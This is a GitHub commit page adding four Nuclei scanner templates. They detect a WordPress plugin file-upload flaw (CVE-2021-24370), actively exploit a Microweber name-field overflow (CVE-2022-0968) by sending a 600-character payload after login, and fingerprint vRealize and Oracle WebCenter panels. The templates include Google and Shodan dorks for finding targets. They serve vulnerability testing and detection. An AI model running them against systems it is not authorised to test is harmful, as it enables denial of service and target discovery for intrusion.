Skip to content

Commit 34c4784

Browse files
committed
up PoCs 2022-08-07
1 parent 53705ce commit 34c4784

File tree

4 files changed

+172
-0
lines changed

4 files changed

+172
-0
lines changed
Lines changed: 42 additions & 0 deletions
Original file line numberDiff line numberDiff line change
@@ -0,0 +1,42 @@
1+
id: CVE-2021-24370
2+
3+
info:
4+
name: Fancy Product Designer WordPress plugin - Remote Code Execution (Detection)
5+
author: pikpikcu
6+
severity: critical
7+
description: |
8+
Fancy Product Designer WordPress plugin before 4.6.9 allows unauthenticated attackers to upload arbitrary files, resulting in remote code execution.
9+
reference:
10+
- https://www.wordfence.com/blog/2021/06/critical-0-day-in-fancy-product-designer-under-active-attack/
11+
- https://wpscan.com/vulnerability/82c52461-1fdc-41e4-9f51-f9dd84962b38
12+
- https://nvd.nist.gov/vuln/detail/CVE-2021-24370
13+
- https://lists.openwall.net/full-disclsure/2020/11/17/2
14+
classification:
15+
cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
16+
cvss-score: 9.8
17+
cve-id: CVE-2021-24370
18+
cwe-id: CWE-434,CWE-434
19+
metadata:
20+
google-dork: inurl:“/wp-content/plugins/fancy-product-designer”
21+
tags: cve,cve2021,wordpress,rce,wp-plugin,wp,fancyproduct
22+
23+
requests:
24+
- method: GET
25+
path:
26+
- "{{BaseURL}}/wp-content/plugins/fancy-product-designer/inc/custom-image-handler.php"
27+
28+
matchers-condition: and
29+
matchers:
30+
- type: word
31+
part: body
32+
words:
33+
- '{"error":"You need to define a directory'
34+
35+
- type: word
36+
part: header
37+
words:
38+
- "text/html"
39+
40+
- type: status
41+
status:
42+
- 200
Lines changed: 77 additions & 0 deletions
Original file line numberDiff line numberDiff line change
@@ -0,0 +1,77 @@
1+
id: CVE-2022-0968
2+
3+
info:
4+
name: Microweber < 1.2.12 - Integer Overflow (DOS)
5+
author: amit-jd
6+
severity: medium
7+
description: |
8+
The microweber application allows large characters to insert in the input field "first & last name" which can allow attackers to cause a Denial of Service (DoS) via a crafted HTTP request. The first name & last name input should be limited to 50 characters or max 100 characters.
9+
reference:
10+
- https://huntr.dev/bounties/97e36678-11cf-42c6-889c-892d415d9f9e/
11+
- https://github.com/advisories/GHSA-5fxv-xx5p-g2fv
12+
- https://nvd.nist.gov/vuln/detail/CVE-2022-0968
13+
- https://huntr.dev/bounties/97e36678-11cf-42c6-889c-892d415d9f9e
14+
classification:
15+
cvss-metrics: CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:N/I:N/A:H
16+
cvss-score: 5.5
17+
cve-id: CVE-2022-0968
18+
cwe-id: CWE-190
19+
tags: cve,cve2022,overflow,microweber,cms
20+
21+
variables:
22+
payload: '{{repeat("A", 600)}}'
23+
24+
requests:
25+
- raw:
26+
- |
27+
POST /api/user_login HTTP/1.1
28+
Host: {{Hostname}}
29+
Content-Type: application/x-www-form-urlencoded
30+
31+
username={{username}}&password={{password}}
32+
33+
- |
34+
GET /admin/view:modules/load_module:users/edit-user:2 HTTP/1.1
35+
Host: {{Hostname}}
36+
37+
- |
38+
POST /api/user/2 HTTP/1.1
39+
Host: {{Hostname}}
40+
Content-Type: application/x-www-form-urlencoded; charset=UTF-8
41+
42+
thumbnail=&id=2&token={{form_token}}&_method=PATCH&username={{user}}&verify_password=&first_name={{payload}}&last_name=test&email={{email}}&phone=&is_admin=0&is_active=1&basic_mode=0&api_key=
43+
44+
req-condition: true
45+
cookie-reuse: true
46+
matchers:
47+
- type: dsl
48+
dsl:
49+
- contains(body_3,'\"first_name\":\"{{payload}}\"')
50+
- 'status_code_3==200'
51+
- 'contains(all_headers_3,"application/json")'
52+
condition: and
53+
54+
extractors:
55+
- type: regex
56+
part: body
57+
name: form_token
58+
internal: true
59+
group: 1
60+
regex:
61+
- '<input type="hidden" name="token" value="(.*)" autocomplete="off">'
62+
63+
- type: regex
64+
part: body
65+
name: user
66+
internal: true
67+
group: 1
68+
regex:
69+
- '<input type="text" class="form-control" name="username" value="(.*)">'
70+
71+
- type: regex
72+
part: body
73+
name: email
74+
internal: true
75+
group: 1
76+
regex:
77+
- '<input type="email" class="form-control" name="email" value="(.*)">'
Lines changed: 26 additions & 0 deletions
Original file line numberDiff line numberDiff line change
@@ -0,0 +1,26 @@
1+
id: vrealize-loginsight-panel
2+
3+
info:
4+
name: vRealize Log Insight Panel
5+
author: pussycat0x
6+
severity: info
7+
description: Detect vRealize Log Insight login panel
8+
metadata:
9+
verified: true
10+
shodan-dork: title:"vRealize Log insight"
11+
tags: panel,vmware,vrealize
12+
13+
requests:
14+
- method: GET
15+
path:
16+
- "{{BaseURL}}/login?loginUrl=%2Findex"
17+
18+
matchers-condition: and
19+
matchers:
20+
- type: word
21+
words:
22+
- 'vRealize Log Insight'
23+
24+
- type: status
25+
status:
26+
- 200
Lines changed: 27 additions & 0 deletions
Original file line numberDiff line numberDiff line change
@@ -0,0 +1,27 @@
1+
id: oracle-webcenter-sites
2+
3+
info:
4+
name: Oracle WebCenter Sites
5+
author: leovalcante
6+
severity: info
7+
metadata:
8+
verified: true
9+
shodan-query: http.html:"WebCenter"
10+
tags: tech,oracle,webcenter
11+
12+
requests:
13+
- method: GET
14+
path:
15+
- '{{BaseURL}}/welcome_webcenter.html'
16+
17+
matchers-condition: and
18+
matchers:
19+
- type: word
20+
words:
21+
- 'FOR ORACLE'
22+
- 'WebCenter Framework'
23+
condition: and
24+
25+
- type: status
26+
status:
27+
- 200

0 commit comments

Comments
 (0)